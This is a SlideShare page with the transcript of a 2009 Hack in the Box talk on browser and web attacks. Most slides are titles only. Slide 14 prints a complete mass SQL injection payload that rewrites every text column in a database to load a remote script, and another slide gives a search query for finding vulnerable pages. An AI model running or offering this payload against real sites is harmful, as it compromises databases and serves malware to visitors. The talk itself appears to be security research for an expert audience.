How to own the world, one desktop at a time

Loading...

Flash Player 9 (or above) is needed to view presentations.
We have detected that you do not have it on your computer. To install it, go here.

0 comments

Post a comment

    Post a comment
    Embed Video
    Edit your comment Cancel

    1 Favorite

    How to own the world, one desktop at a time - Presentation Transcript

    1. How to own the world,one desktop at a time
      Saumil Shah, Net-Square
      Hack in the Box
      Kuala Lumpur 2009
    2. # who am i
      Saumil Shah, CEO Net-square
      LinkedIn: saumilshah
    3. I'M IN UR BASE
      KILLIN UR D00DZ
    4. "The amount of intelligence in the world stays constant and the population increases."
    5. The Attack Surface
    6. The Attack Surface++
    7. Browser Attacks
    8. Helping Hands
      Alexander Sotirov, Mark Dowd - Bypassing Browser Memory Protection
    9. Taking your work to the masses
      SQL Injection
      XSS
    10. The metamorphosis of script src
    11. Web Hacking
    12. SQL Injection Discovery
      inurl:".asp" inurl:"a="
    13. An example
    14. Mass SQL Injection vector
      declare @m varchar(8000);
      set @m='';
      select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script src="http://is.gd/31337"></script>'';'
      from dbo.sysobjects objs, dbo.syscolumns cols, dbo.systypes typs
      where objs.id=cols.id
      and objs.xtype='U'
      and cols.xtype=typs.xtype
      and typs.name='varchar';
      set @m=REVERSE(@m);
      set @m=substring(@m,PATINDEX('%;%',@m),8000);
      set @m=REVERSE(@m);
      exec(@m);
    15. Documents
    16. Penetration Document FormatTM
      http://blog.didierstevens.com
    17. "Confidence in a connected world"
    18. Security by pop-ups
    19. kthxbai
      www.net-square.com
      secure . automate . innovate
    SlideShare Zeitgeist 2009

    + Saumil ShahSaumil Shah Nominate

    custom

    87 views, 1 favs, 0 embeds more stats

    As 2009 comes to a close, we look back on the bugs more

    More info about this document

    © All Rights Reserved

    Go to text version

    • Total Views 87
      • 87 on SlideShare
      • 0 from embeds
    • Comments 0
    • Favorites 1
    • Downloads 0
    Most viewed embeds

    more

    All embeds

    less

    Flagged as inappropriate Flag as inappropriate
    Flag as inappropriate

    Select your reason for flagging this presentation as inappropriate. If needed, use the feedback form to let us know more details.

    Cancel
    File a copyright complaint
    Having problems? Go to our helpdesk?

    Categories